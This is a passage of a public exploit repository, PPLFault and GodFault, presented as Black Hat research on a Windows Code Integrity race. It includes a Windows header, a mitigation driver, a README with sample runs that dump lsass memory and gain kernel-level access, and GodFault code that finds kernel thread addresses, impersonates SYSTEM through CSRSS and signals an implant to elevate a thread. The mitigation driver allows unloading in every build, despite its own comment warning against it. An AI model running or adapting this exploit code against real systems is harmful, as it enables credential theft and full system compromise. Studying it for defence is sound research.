functions 3 | * 4 | * This file is part of System Informer. 5 | */ 6 | 7 | #ifndef _NTPNPAPI_H 8 | #define _NTPNPAPI_H 9 | 10 | typedef enum _PLUGPLAY_EVENT_CATEGORY 11 | { 12 | HardwareProfileChangeEvent, 13 | TargetDeviceChangeEvent, 14 | DeviceClassChangeEvent, 15 | CustomDeviceEvent, 16 | DeviceInstallEvent, 17 | DeviceArrivalEvent, 18 | PowerEvent, 19 | VetoEvent, 20 | BlockedDriverEvent, 21 | InvalidIDEvent, 22 | MaxPlugEventCategory 23 | } PLUGPLAY_EVENT_CATEGORY, *PPLUGPLAY_EVENT_CATEGORY; 24 | 25 | typedef struct _PLUGPLAY_EVENT_BLOCK 26 | { 27 | GUID EventGuid; 28 | PLUGPLAY_EVENT_CATEGORY EventCategory; 29 | PULONG Result; 30 | ULONG Flags; 31 | ULONG TotalSize; 32 | PVOID DeviceObject; 33 | 34 | union 35 | { 36 | struct 37 | { 38 | GUID ClassGuid; 39 | WCHAR SymbolicLinkName[1]; 40 | } DeviceClass; 41 | struct 42 | { 43 | WCHAR DeviceIds[1]; 44 | } TargetDevice; 45 | struct 46 | { 47 | WCHAR DeviceId[1]; 48 | } InstallDevice; 49 | struct 50 | { 51 | PVOID NotificationStructure; 52 | WCHAR DeviceIds[1]; 53 | } CustomNotification; 54 | struct 55 | { 56 | PVOID Notification; 57 | } ProfileNotification; 58 | struct 59 | { 60 | ULONG NotificationCode; 61 | ULONG NotificationData; 62 | } PowerNotification; 63 | struct 64 | { 65 | PNP_VETO_TYPE VetoType; 66 | WCHAR DeviceIdVetoNameBuffer[1]; // DeviceIdVetoName 67 | } VetoNotification; 68 | struct 69 | { 70 | GUID BlockedDriverGuid; 71 | } BlockedDriverNotification; 72 | struct 73 | { 74 | WCHAR ParentId[1]; 75 | } InvalidIDNotification; 76 | } u; 77 | } PLUGPLAY_EVENT_BLOCK, *PPLUGPLAY_EVENT_BLOCK; 78 | 79 | typedef enum _PLUGPLAY_CONTROL_CLASS 80 | { 81 | PlugPlayControlEnumerateDevice, // PLUGPLAY_CONTROL_ENUMERATE_DEVICE_DATA 82 | PlugPlayControlRegisterNewDevice, // PLUGPLAY_CONTROL_DEVICE_CONTROL_DATA 83 | PlugPlayControlDeregisterDevice, // PLUGPLAY_CONTROL_DEVICE_CONTROL_DATA 84 | PlugPlayControlInitializeDevice, // PLUGPLAY_CONTROL_DEVICE_CONTROL_DATA 85 | PlugPlayControlStartDevice, // 
PLUGPLAY_CONTROL_DEVICE_CONTROL_DATA 86 | PlugPlayControlUnlockDevice, // PLUGPLAY_CONTROL_DEVICE_CONTROL_DATA 87 | PlugPlayControlQueryAndRemoveDevice, // PLUGPLAY_CONTROL_QUERY_AND_REMOVE_DATA 88 | PlugPlayControlUserResponse, // PLUGPLAY_CONTROL_USER_RESPONSE_DATA 89 | PlugPlayControlGenerateLegacyDevice, // PLUGPLAY_CONTROL_LEGACY_DEVGEN_DATA 90 | PlugPlayControlGetInterfaceDeviceList, // PLUGPLAY_CONTROL_INTERFACE_LIST_DATA 91 | PlugPlayControlProperty, // PLUGPLAY_CONTROL_PROPERTY_DATA 92 | PlugPlayControlDeviceClassAssociation, // PLUGPLAY_CONTROL_CLASS_ASSOCIATION_DATA 93 | PlugPlayControlGetRelatedDevice, // PLUGPLAY_CONTROL_RELATED_DEVICE_DATA 94 | PlugPlayControlGetInterfaceDeviceAlias, // PLUGPLAY_CONTROL_INTERFACE_ALIAS_DATA 95 | PlugPlayControlDeviceStatus, // PLUGPLAY_CONTROL_STATUS_DATA 96 | PlugPlayControlGetDeviceDepth, // PLUGPLAY_CONTROL_DEPTH_DATA 97 | PlugPlayControlQueryDeviceRelations, // PLUGPLAY_CONTROL_DEVICE_RELATIONS_DATA 98 | PlugPlayControlTargetDeviceRelation, // PLUGPLAY_CONTROL_TARGET_RELATION_DATA 99 | PlugPlayControlQueryConflictList, // PLUGPLAY_CONTROL_CONFLICT_LIST 100 | PlugPlayControlRetrieveDock, // PLUGPLAY_CONTROL_RETRIEVE_DOCK_DATA 101 | PlugPlayControlResetDevice, // PLUGPLAY_CONTROL_DEVICE_CONTROL_DATA 102 | PlugPlayControlHaltDevice, // PLUGPLAY_CONTROL_DEVICE_CONTROL_DATA 103 | PlugPlayControlGetBlockedDriverList, // PLUGPLAY_CONTROL_BLOCKED_DRIVER_DATA 104 | PlugPlayControlGetDeviceInterfaceEnabled, // PLUGPLAY_CONTROL_DEVICE_INTERFACE_ENABLED 105 | MaxPlugPlayControl 106 | } PLUGPLAY_CONTROL_CLASS, *PPLUGPLAY_CONTROL_CLASS; 107 | 108 | #if (PHNT_VERSION < PHNT_WIN8) 109 | NTSYSCALLAPI 110 | NTSTATUS 111 | NTAPI 112 | NtGetPlugPlayEvent( 113 | _In_ HANDLE EventHandle, 114 | _In_opt_ PVOID Context, 115 | _Out_writes_bytes_(EventBufferSize) PPLUGPLAY_EVENT_BLOCK EventBlock, 116 | _In_ ULONG EventBufferSize 117 | ); 118 | #endif 119 | 120 | NTSYSCALLAPI 121 | NTSTATUS 122 | NTAPI 123 | NtPlugPlayControl( 124 | _In_ 
PLUGPLAY_CONTROL_CLASS PnPControlClass, 125 | _Inout_updates_bytes_(PnPControlDataLength) PVOID PnPControlData, 126 | _In_ ULONG PnPControlDataLength 127 | ); 128 | 129 | #if (PHNT_VERSION >= PHNT_WIN7) 130 | 131 | NTSYSCALLAPI 132 | NTSTATUS 133 | NTAPI 134 | NtSerializeBoot( 135 | VOID 136 | ); 137 | 138 | NTSYSCALLAPI 139 | NTSTATUS 140 | NTAPI 141 | NtEnableLastKnownGood( 142 | VOID 143 | ); 144 | 145 | NTSYSCALLAPI 146 | NTSTATUS 147 | NTAPI 148 | NtDisableLastKnownGood( 149 | VOID 150 | ); 151 | 152 | #endif 153 | 154 | #if (PHNT_VERSION >= PHNT_VISTA) 155 | NTSYSCALLAPI 156 | NTSTATUS 157 | NTAPI 158 | NtReplacePartitionUnit( 159 | _In_ PUNICODE_STRING TargetInstancePath, 160 | _In_ PUNICODE_STRING SpareInstancePath, 161 | _In_ ULONG Flags 162 | ); 163 | #endif 164 | 165 | #endif 166 | -------------------------------------------------------------------------------- /NoFault/NoFault.cpp: -------------------------------------------------------------------------------- 1 | #include "NoFault.h" 2 | 3 | // Define _ALLOW_UNLOAD if you want to allow this driver to be unloaded 4 | // This allows malware to unload this driver and exploit previously-protected systems 5 | // If unloads are not allowed, the system must be rebooted to remove the protection provided by this driver 6 | #ifdef _DEBUG 7 | #define _ALLOW_UNLOAD 8 | #else 9 | #define _ALLOW_UNLOAD 10 | #endif // _DEBUG 11 | 12 | 13 | 14 | // Applies BlockRemoteImageLoads mitigation to the given process 15 | NTSTATUS HardenProcess(PEPROCESS pProcess, HANDLE hProcess) 16 | { 17 | NTSTATUS ntStatus = STATUS_SUCCESS; 18 | PROCESS_MITIGATION_POLICY_INFORMATION policy; 19 | KAPC_STATE apcState = { 0, }; 20 | 21 | RtlZeroMemory(&policy, sizeof(policy)); 22 | 23 | // First pull existing policy 24 | policy.Policy = ProcessImageLoadPolicy; 25 | ntStatus = ZwQueryInformationProcess(hProcess, ProcessMitigationPolicy, &policy, sizeof(policy), NULL); 26 | if (!NT_SUCCESS(ntStatus)) 27 | { 28 | goto Cleanup; 29 | } 30 | 31 | 
// The attack uses the SMB redirector 32 | policy.ImageLoadPolicy.NoRemoteImages = TRUE; 33 | 34 | // ZwSetInformationProcess(ProcessMitigationPolicy) requires ZwCurrentProcess(), so briefly jump into the remote process 35 | KeStackAttachProcess(pProcess, &apcState); 36 | { 37 | ntStatus = ZwSetInformationProcess(ZwCurrentProcess(), ProcessMitigationPolicy, &policy, sizeof(policy)); 38 | } 39 | KeUnstackDetachProcess(&apcState); 40 | 41 | Cleanup: 42 | return ntStatus; 43 | } 44 | 45 | // Is the current process *-Full or WinTcb-Light? 46 | BOOLEAN IsCurrentProcessFullPPOrWinTcbLight() 47 | { 48 | NTSTATUS ntStatus = STATUS_SUCCESS; 49 | BOOLEAN bResult = FALSE; 50 | PS_PROTECTION protection = { 0, }; 51 | 52 | ntStatus = ZwQueryInformationProcess(ZwCurrentProcess(), ProcessProtectionInformation, &protection, sizeof(protection), NULL); 53 | if (!NT_SUCCESS(ntStatus)) 54 | { 55 | goto Cleanup; 56 | } 57 | 58 | // Full Protected Processes 59 | if (PsProtectedTypeProtected == protection.Type) 60 | { 61 | bResult = TRUE; 62 | goto Cleanup; 63 | } 64 | 65 | // WinTcb-Light 66 | if ((PsProtectedTypeProtectedLight == protection.Type) && 67 | (PsProtectedSignerWinTcb == protection.Signer)) 68 | { 69 | bResult = TRUE; 70 | goto Cleanup; 71 | } 72 | 73 | Cleanup: 74 | return bResult; 75 | } 76 | 77 | // Returns whether the given process should have the BlockRemoteImageLoads mitigation policy applied 78 | BOOLEAN ShouldHardenProcess(HANDLE hProcess) 79 | { 80 | BOOLEAN bResult = FALSE; 81 | NTSTATUS ntStatus = STATUS_SUCCESS; 82 | PS_PROTECTION protection = { 0, }; 83 | 84 | // Do not interfere with actions taken by core Windows processes 85 | if (IsCurrentProcessFullPPOrWinTcbLight()) 86 | { 87 | goto Cleanup; 88 | } 89 | 90 | // Determine protection status 91 | ntStatus = ZwQueryInformationProcess(hProcess, ProcessProtectionInformation, &protection, sizeof(protection), NULL); 92 | if (!NT_SUCCESS(ntStatus)) 93 | { 94 | goto Cleanup; 95 | } 96 | 97 | // Only applies to PPL. 
I could not reproduce this on PP. 98 | if (PsProtectedTypeProtectedLight != protection.Type) 99 | { 100 | goto Cleanup; 101 | } 102 | 103 | switch (protection.Signer) 104 | { 105 | case PsProtectedSignerCodeGen: 106 | case PsProtectedSignerLsa: 107 | case PsProtectedSignerWindows: 108 | case PsProtectedSignerWinTcb: 109 | case PsProtectedSignerWinSystem: 110 | case PsProtectedSignerAntimalware: 111 | // Note: Applying this to PsProtectedSignerAntimalware is debatable 112 | // External vendors can run code as PsProtectedSignerAntimalware-Light, so enabling this here risks breaking their software 113 | // We could enable it by default, and allow them to opt-out via SetProcessMitigationPolicy 114 | bResult = TRUE; 115 | default: 116 | break; 117 | } 118 | 119 | Cleanup: 120 | return bResult; 121 | } 122 | 123 | void CreateProcessNotifyRoutine( 124 | PEPROCESS pProcess, 125 | HANDLE ProcessId, 126 | PPS_CREATE_NOTIFY_INFO CreateInfo 127 | ) 128 | { 129 | HANDLE hProcess = NULL; 130 | NTSTATUS ntStatus = STATUS_SUCCESS; 131 | 132 | UNREFERENCED_PARAMETER(ProcessId); 133 | 134 | if (!CreateInfo) 135 | { 136 | // Process termination 137 | goto Cleanup; 138 | } 139 | 140 | // PEPROCESS -> HANDLE 141 | ntStatus = ObOpenObjectByPointer(pProcess, OBJ_KERNEL_HANDLE, NULL, PROCESS_ALL_ACCESS, *PsProcessType, KernelMode, &hProcess); 142 | if (!NT_SUCCESS(ntStatus)) 143 | { 144 | goto Cleanup; 145 | } 146 | 147 | if (ShouldHardenProcess(hProcess)) 148 | { 149 | (void)HardenProcess(pProcess, hProcess); 150 | } 151 | 152 | Cleanup: 153 | if (hProcess) 154 | { 155 | ZwClose(hProcess); 156 | } 157 | 158 | return; 159 | } 160 | 161 | void 162 | DriverUnload( 163 | IN PDRIVER_OBJECT DriverObject) 164 | { 165 | UNREFERENCED_PARAMETER(DriverObject); 166 | 167 | (void)PsSetCreateProcessNotifyRoutineEx(CreateProcessNotifyRoutine, TRUE); 168 | } 169 | 170 | EXTERN_C 171 | NTSTATUS DriverEntry( 172 | _In_ PDRIVER_OBJECT DriverObject, 173 | _In_ PUNICODE_STRING RegistryPath 174 | ) 175 | { 
176 | NTSTATUS ntStatus = STATUS_SUCCESS; 177 | 178 | UNREFERENCED_PARAMETER(DriverObject); 179 | UNREFERENCED_PARAMETER(RegistryPath); 180 | 181 | ntStatus = PsSetCreateProcessNotifyRoutineEx(CreateProcessNotifyRoutine, FALSE); 182 | 183 | #ifdef _ALLOW_UNLOAD 184 | DriverObject->DriverUnload = DriverUnload; 185 | #endif // _ALLOW_UNLOAD 186 | 187 | return ntStatus; 188 | } 189 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # PPLFault 2 | 3 | By [Gabriel Landau](https://twitter.com/GabrielLandau) at [Elastic Security](https://www.elastic.co/security-labs/). 4 | 5 | From [PPLdump Is Dead. Long Live PPLdump!](https://www.blackhat.com/asia-23/briefings/schedule/#ppldump-is-dead-long-live-ppldump-31052) presented at [Black Hat Asia 2023](https://www.blackhat.com/asia-23). 6 | 7 | [![PPLdump Is Dead. Long Live PPLdump!](http://img.youtube.com/vi/5xteW8Tm410/0.jpg)](http://www.youtube.com/watch?v=5xteW8Tm410 "PPLdump Is Dead. Long Live PPLdump!") 8 | 9 | ## PPLFault 10 | 11 | **2024-02 UPDATE: Microsoft patched PPLFault on 2024-02-13. See [this thread](https://x.com/GabrielLandau/status/1757818200127946922?s=20) for related discussion.** 12 | 13 | Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process. For more details on the exploit, see my [slides](http://i.blackhat.com/Asia-23/AS-23-Landau-PPLdump-Is-Dead-Long-Live-PPLdump.pdf) and/or [talk](https://x.com/GabrielLandau/status/1707773387731272085). 
14 | 15 | ### Example Output 16 | 17 | ``` 18 | PS C:\Users\user\Desktop> cmd /c ver 19 | 20 | Microsoft Windows [Version 10.0.25346.1001] 21 | PS C:\Users\user\Desktop> tasklist | findstr lsass 22 | lsass.exe 992 Services 0 76,620 K 23 | PS C:\Users\user\Desktop> (Get-NtProcess -Access QueryLimitedInformation -Pid 992).Protection 24 | 25 | Type Signer 26 | ---- ------ 27 | ProtectedLight Lsa 28 | 29 | 30 | PS C:\Users\user\Desktop> dir *.dmp 31 | PS C:\Users\user\Desktop> .\PPLFault.exe -v 992 lsass.dmp 32 | [+] No cleanup necessary. Backup does not exist. 33 | [+] GetShellcode: 528 bytes of shellcode written over DLL entrypoint 34 | [+] Benign: C:\Windows\System32\EventAggregation.dll.bak 35 | [+] Payload: C:\PPLFaultTemp\PPLFaultPayload.dll 36 | [+] Placeholder: C:\PPLFaultTemp\EventAggregationPH.dll 37 | [+] Acquired exclusive oplock to file: C:\Windows\System32\devobj.dll 38 | [+] Ready. Spawning WinTcb. 39 | [+] SpawnPPL: Waiting for child process to finish. 40 | [+] FetchDataCallback called. 41 | [+] Hydrating 90112 bytes at offset 0 42 | [+] Switching to payload 43 | [+] Emptying system working set 44 | [+] Working set purged 45 | [+] Give the memory manager a moment to think 46 | [+] Hydrating 90112 PAYLOAD bytes at offset 0 47 | [+] Dump saved to: lsass.dmp 48 | [+] Dump is 74.9 MB 49 | [+] Operation took 937 ms 50 | PS C:\Users\user\Desktop> dir *.dmp 51 | 52 | 53 | Directory: C:\Users\user\Desktop 54 | 55 | 56 | Mode LastWriteTime Length Name 57 | ---- ------------- ------ ---- 58 | -a---- 5/1/2023 11:18 AM 78581973 lsass.dmp 59 | ``` 60 | 61 | ## GodFault 62 | 63 | Exploits the same TOCTOU as PPLFault. However instead of dumping a process, it migrates to CSRSS and exploits a vulnerability in `win32k!NtUserHardErrorControlCall` from [ANGRYORCHARD](https://github.com/gabriellandau/ANGRYORCHARD/blob/0a4720f7e07e86a9ac2783411b81efac14938e26/Exploit.c#L69-L81) to decrement `KTHREAD.PreviousMode` from `UserMode` (1) to `KernelMode` (0). 
It proves "God Mode" access by opening `\Device\PhysicalMemory`, normally inaccessible from `UserMode`, as `SECTION_ALL_ACCESS`. 64 | 65 | ### Example Output 66 | 67 | ``` 68 | C:\Users\user\Desktop>GodFault.exe -v 69 | [?] Server does not appear to be running. Attempting to install it... 70 | [+] No cleanup necessary. Backup does not exist. 71 | [+] GetShellcode: 2304 bytes of shellcode written over DLL entrypoint 72 | [+] CSRSS PID is 772 73 | [+] Benign: C:\Windows\System32\EventAggregation.dll.bak 74 | [+] Payload: C:\GodFaultTemp\GodFaultPayload.dll 75 | [+] Placeholder: C:\GodFaultTemp\EventAggregationPH.dll 76 | [+] Acquired exclusive oplock to file: C:\Windows\System32\devobj.dll 77 | [+] Testing initial ability to acquire PROCESS_ALL_ACCESS to System: Failure 78 | [+] Ready. Spawning WinTcb. 79 | [+] SpawnPPL: Waiting for child process to finish. 80 | [+] FetchDataCallback called. 81 | [+] Hydrating 90112 bytes at offset 0 82 | [+] Switching to payload 83 | [+] Emptying system working set 84 | [+] Working set purged 85 | [+] Give the memory manager a moment to think 86 | [+] Hydrating 90112 PAYLOAD bytes at offset 0 87 | [+] Thread 6248 (KTHREAD FFFFA283B0A62080) has been blessed 88 | [+] Testing post-exploit ability to acquire PROCESS_ALL_ACCESS to System: Success 89 | [+] Opened \Device\PhysicalMemory. Handle is 0x1b4 90 | [+] Opened System process as PROCESS_ALL_ACCESS. Handle is 0x1c0 91 | [+] Press any key to continue... 92 | [+] No cleanup necessary. Backup does not exist. 93 | ``` 94 | 95 | ## Python 96 | PoC that achieves arbitrary code execution as WinTcb-Light without the CloudFilter API. See [python/README.md](python/README.md). 
97 | 98 | ## Tested Platforms 99 | 100 | | | Windows 11 22H2 22621.1702 (May 2023) | Windows 11 Insider Canary 25346.1001 (April 2023) | 101 | | - | - | - | 102 | | PPLFault | ✔️ | ✔️ | 103 | | GodFault | ✔️ | ❌ Insider PreviousMode mitigation [bugchecks](https://twitter.com/GabrielLandau/status/1597001955909697536?s=20) | 104 | 105 | # License 106 | 107 | PPLFault is covered by the [ELv2 license](LICENSE.txt). It uses [phnt](https://github.com/winsiderss/systeminformer/tree/25846070780183848dc8d8f335a54fa6e636e281/phnt) from SystemInformer under the [MIT license](phnt/LICENSE.txt). 108 | 109 | # Credits 110 | Inspired by [PPLdump](https://github.com/itm4n/PPLdump) by [Clément Labro](https://infosec.exchange/@itm4n), which Microsoft [patched](https://itm4n.github.io/the-end-of-ppldump/) in July 2022. 111 | 112 | [ANGRYORCHARD](https://github.com/gabriellandau/ANGRYORCHARD) was created by [Austin Hudson](https://twitter.com/ilove2pwn_), who released it when Microsoft patched PPLdump. 113 | -------------------------------------------------------------------------------- /GodFault/IPC.cpp: -------------------------------------------------------------------------------- 1 | // PPLFault by Gabriel Landau 2 | // https://twitter.com/GabrielLandau 3 | 4 | #define _CRT_SECURE_NO_WARNINGS 5 | #include "Payload.h" 6 | #include "GMShellcode.h" 7 | #include "resource.h" 8 | #include "Logging.h" 9 | #include 10 | #include 11 | #include 12 | #include 13 | 14 | // Locates the KTHREAD for the given thread ID 15 | // Note that this returns a kernel address 16 | PVOID FindKTHREAD(DWORD dwThreadId) 17 | { 18 | NTSTATUS ntStatus = NULL; 19 | PVOID pThread = NULL; 20 | PSYSTEM_HANDLE_INFORMATION pInfo = NULL; 21 | std::string buf; 22 | 23 | // Create a handle to the thread 24 | HANDLE hThread = OpenThread(SYNCHRONIZE, FALSE, dwThreadId); 25 | if (!hThread) 26 | { 27 | Log(Error, "Failed to open my own thread?!?"); 28 | goto Cleanup; 29 | } 30 | 31 | // Get a list of all handles on the 
system 32 | do 33 | { 34 | buf.resize(buf.empty() ? (1024 * 1024) : (buf.size() * 2)); 35 | ntStatus = NtQuerySystemInformation(SystemHandleInformation, &buf[0], (ULONG)buf.size(), NULL); 36 | } while (STATUS_INFO_LENGTH_MISMATCH == ntStatus); 37 | 38 | if (!NT_SUCCESS(ntStatus)) 39 | { 40 | Log(Error, "NtQuerySystemInformation(SystemHandleInformation) failed with NTSTATUS 0x%08x", ntStatus); 41 | goto Cleanup; 42 | } 43 | 44 | pInfo = (PSYSTEM_HANDLE_INFORMATION)&buf[0]; 45 | for (ULONG i = 0; i < pInfo->NumberOfHandles; i++) 46 | { 47 | const SYSTEM_HANDLE_TABLE_ENTRY_INFO& info = pInfo->Handles[i]; 48 | 49 | // Find the entry that corresponds to the the handle we created above 50 | // It will have our PID, and the same handle value 51 | if ((GetCurrentProcessId() == info.UniqueProcessId) && ((USHORT)(ULONG_PTR)hThread == info.HandleValue)) 52 | { 53 | // Return the pointer 54 | pThread = info.Object; 55 | goto Cleanup; 56 | } 57 | } 58 | 59 | Cleanup: 60 | CloseHandle(hThread); 61 | return pThread; 62 | } 63 | 64 | // Impersonate CSRSS, which runs as SYSTEM 65 | bool GetSystem() 66 | { 67 | bool bResult = false; 68 | HANDLE hToken = NULL; 69 | HMODULE hNtdll = GetModuleHandleW(L"ntdll.dll"); 70 | CsrGetProcessId_t pCsrGetProcessId = (CsrGetProcessId_t)GetProcAddress(hNtdll, "CsrGetProcessId"); 71 | HANDLE hProcess = OpenProcess(PROCESS_QUERY_LIMITED_INFORMATION, FALSE, pCsrGetProcessId()); 72 | 73 | if (hProcess && OpenProcessToken(hProcess, TOKEN_QUERY | TOKEN_DUPLICATE, &hToken)) 74 | { 75 | bResult = ImpersonateLoggedOnUser(hToken); 76 | CloseHandle(hToken); 77 | } 78 | else 79 | { 80 | Log(Error, "Failed to open CSRSS's token"); 81 | } 82 | 83 | CloseHandle(hProcess); 84 | return bResult; 85 | } 86 | 87 | // Ask our CSRSS implant to set the given thread's PreviousMode to KernelMode using ANGRYORCHARD 88 | bool BlessThread(DWORD dwThreadId, bool bFatal) 89 | { 90 | bool bResult = false; 91 | HANDLE hMutex = NULL; 92 | HANDLE hReq = NULL; 93 | HANDLE hDone = 
NULL; 94 | HANDLE hSection = NULL; 95 | PVOID pThread = NULL; 96 | PIPC_SECTION pSection = NULL; 97 | bool bMustReleaseMutex = false; 98 | 99 | if (0 == dwThreadId) 100 | { 101 | goto Cleanup; 102 | } 103 | 104 | pThread = FindKTHREAD(dwThreadId); 105 | if (!pThread) 106 | { 107 | Log(Error, "Failed to find thread %u"); 108 | goto Cleanup; 109 | } 110 | 111 | // Get SYSTEM in case we're only Admin 112 | if (!GetSystem()) 113 | { 114 | Log(Warning, "Failed to impersonate SYSTEM. This may break IPC if you're not already running as SYSTEM."); 115 | } 116 | 117 | hMutex = OpenMutexW(SYNCHRONIZE, FALSE, GLOBAL MUTEX_NAME_BASE); 118 | hReq = OpenEventW(EVENT_MODIFY_STATE, FALSE, GLOBAL REQ_NAME_BASE); 119 | hDone = OpenEventW(SYNCHRONIZE, FALSE, GLOBAL DONE_NAME_BASE); 120 | hSection = OpenFileMappingW(FILE_MAP_WRITE, FALSE, GLOBAL SECTION_NAME_BASE); 121 | 122 | if (!hMutex || !hReq || !hDone || !hSection) 123 | { 124 | if (bFatal) 125 | { 126 | Log(Error, "Server does not appear to be running."); 127 | } 128 | else 129 | { 130 | Log(Warning, "Server does not appear to be running. 
Attempting to install it..."); 131 | } 132 | goto Cleanup; 133 | } 134 | 135 | pSection = (PIPC_SECTION)MapViewOfFile(hSection, FILE_MAP_WRITE, 0, 0, 4096); 136 | if (!pSection) 137 | { 138 | Log(Error, "Failed to map IPC section."); 139 | goto Cleanup; 140 | } 141 | 142 | if (WAIT_OBJECT_0 != WaitForSingleObject(hMutex, 1000)) 143 | { 144 | Log(Error, "Failed to acquire mutex."); 145 | goto Cleanup; 146 | } 147 | bMustReleaseMutex = true; 148 | 149 | // Send request 150 | pSection->pThread = pThread; 151 | pSection->ntStatus = STATUS_UNSUCCESSFUL; 152 | FlushViewOfFile(pSection, sizeof(*pSection)); 153 | SetEvent(hReq); 154 | 155 | // Wait for ACK 156 | WaitForSingleObject(hDone, 1000); 157 | 158 | if (!NT_SUCCESS(pSection->ntStatus)) 159 | { 160 | Log(Error, "Bless IPC failed with NTSTATUS 0x%08x.", pSection->ntStatus); 161 | goto Cleanup; 162 | } 163 | 164 | Log(Info, "Thread %u (KTHREAD %p) has been blessed by GodFault", dwThreadId, pThread); 165 | bResult = true; 166 | 167 | Cleanup: 168 | if (bMustReleaseMutex) ReleaseMutex(hMutex); 169 | if (pSection) UnmapViewOfFile(pSection); 170 | if (hMutex) CloseHandle(hMutex); 171 | if (hReq) CloseHandle(hReq); 172 | if (hDone) CloseHandle(hDone); 173 | if (hSection) CloseHandle(hSection); 174 | 175 | RevertToSelf(); 176 | 177 | return bResult; 178 | } 179 | -------------------------------------------------------------------------------- /GodFault/GodFault.vcxproj: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Debug 6 | x64 7 | 8 | 9 | Release 10 | x64 11 | 12 | 13 | 14 | 16.0 15 | Win32Proj 16 | {3c206b0d-0725-4d6d-8047-bbcc6d260410} 17 | GodFault 18 | 10.0 19 | 20 | 21 | 22 | Application 23 | true 24 | v142 25 | Unicode 26 | false 27 | 28 | 29 | Application 30 | false 31 | v142 32 | true 33 | Unicode 34 | false 35 | 36 | 37 | 38 | 39 | 40 | 41 | 42 | 43 | 44 | 45 | 46 | 47 | 48 | 49 | true 50 | 51 | 52 | false 53 | 54 | 55 | 56 | Level3 57 | true 58 | 
_DEBUG;_CONSOLE;%(PreprocessorDefinitions) 59 | true 60 | $(SolutionDir)\Utils;$(SolutionDir)/phnt/include;$(SolutionDir)\GMShellcode;%(AdditionalIncludeDirectories) 61 | 62 | 63 | Console 64 | true 65 | $(OutDir)/Utils.lib;shlwapi.lib;dbghelp.lib;ntdll.lib;Pathcch.lib;CldApi.lib;kernel32.lib;user32.lib;gdi32.lib;winspool.lib;comdlg32.lib;advapi32.lib;shell32.lib;ole32.lib;oleaut32.lib;uuid.lib;odbc32.lib;odbccp32.lib;%(AdditionalDependencies) 66 | 67 | 68 | 69 | 70 | Level3 71 | true 72 | true 73 | true 74 | NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 75 | true 76 | MultiThreaded 77 | $(SolutionDir)\Utils;$(SolutionDir)/phnt/include;$(SolutionDir)\GMShellcode;%(AdditionalIncludeDirectories) 78 | 79 | 80 | Console 81 | true 82 | true 83 | true 84 | $(OutDir)/Utils.lib;shlwapi.lib;dbghelp.lib;ntdll.lib;Pathcch.lib;CldApi.lib;kernel32.lib;user32.lib;gdi32.lib;winspool.lib;comdlg32.lib;advapi32.lib;shell32.lib;ole32.lib;oleaut32.lib;uuid.lib;odbc32.lib;odbccp32.lib;%(AdditionalDependencies) 85 | 86 | 87 | 88 | 89 | 90 | 91 | 92 | 93 | 94 | 95 | 96 | 97 | 98 | 99 | 100 | _DEBUG;_UNICODE;UNICODE;%(PreprocessorDefinitions) 101 | 102 | 103 | 104 | 105 | 106 | -------------------------------------------------------------------------------- /PPLFault/PPLFault.vcxproj: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Debug 6 | x64 7 | 8 | 9 | Release 10 | x64 11 | 12 | 13 | 14 | 16.0 15 | Win32Proj 16 | {b2e27b81-83d9-47c6-a27e-94a79d0234d7} 17 | PPLFaultGM 18 | 10.0 19 | 20 | 21 | 22 | Application 23 | true 24 | v142 25 | Unicode 26 | false 27 | 28 | 29 | Application 30 | false 31 | v142 32 | true 33 | Unicode 34 | false 35 | 36 | 37 | 38 | 39 | 40 | 41 | 42 | 43 | 44 | 45 | 46 | 47 | 48 | 49 | true 50 | 51 | 52 | false 53 | 54 | 55 | 56 | Level3 57 | true 58 | _DEBUG;_CONSOLE;%(PreprocessorDefinitions) 59 | true 60 | 
$(SolutionDir)\Utils;$(SolutionDir)/phnt/include;$(SolutionDir)\DumpShellcode;%(AdditionalIncludeDirectories) 61 | 62 | 63 | Console 64 | true 65 | $(OutDir)/Utils.lib;shlwapi.lib;dbghelp.lib;ntdll.lib;Pathcch.lib;CldApi.lib;kernel32.lib;user32.lib;gdi32.lib;winspool.lib;comdlg32.lib;advapi32.lib;shell32.lib;ole32.lib;oleaut32.lib;uuid.lib;odbc32.lib;odbccp32.lib;%(AdditionalDependencies) 66 | 67 | 68 | 69 | 70 | Level3 71 | true 72 | true 73 | true 74 | NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 75 | true 76 | MultiThreaded 77 | $(SolutionDir)\Utils;$(SolutionDir)/phnt/include;$(SolutionDir)\DumpShellcode;%(AdditionalIncludeDirectories) 78 | 79 | 80 | Console 81 | true 82 | true 83 | true 84 | $(OutDir)/Utils.lib;shlwapi.lib;dbghelp.lib;ntdll.lib;Pathcch.lib;CldApi.lib;kernel32.lib;user32.lib;gdi32.lib;winspool.lib;comdlg32.lib;advapi32.lib;shell32.lib;ole32.lib;oleaut32.lib;uuid.lib;odbc32.lib;odbccp32.lib;%(AdditionalDependencies) 85 | 86 | 87 | 88 | 89 | 90 | 91 | 92 | 93 | 94 | 95 | 96 | 97 | 98 | 99 | 100 | _DEBUG;_UNICODE;UNICODE;%(PreprocessorDefinitions) 101 | 102 | 103 | 104 | 105 | 106 | -------------------------------------------------------------------------------- /GodFault/Payload.cpp: -------------------------------------------------------------------------------- 1 | // PPLFault by Gabriel Landau 2 | // https://twitter.com/GabrielLandau 3 | 4 | #define _CRT_SECURE_NO_WARNINGS 5 | #include "Payload.h" 6 | #include "GMShellcode.h" 7 | #include "resource.h" 8 | #include "Logging.h" 9 | #include "PayloadUtils.h" 10 | #include 11 | #include 12 | #include 13 | 14 | bool InitShellcodeParams( 15 | PSHELLCODE_PARAMS pParams 16 | ) 17 | { 18 | HMODULE hNtdll = GetModuleHandleW(L"ntdll.dll"); 19 | HMODULE hWin32U = LoadLibraryW(L"win32u.dll"); 20 | CsrGetProcessId_t pCsrGetProcessId = NULL; 21 | uint8_t nops[MAGIC_NOPS_LENGTH] = MAGIC_NOPS; 22 | 23 | ZeroMemory(pParams, sizeof(*pParams)); 24 | 25 | pParams->magic1 = MAGIC1; 26 | pParams->magic2 = MAGIC2; 27 | 
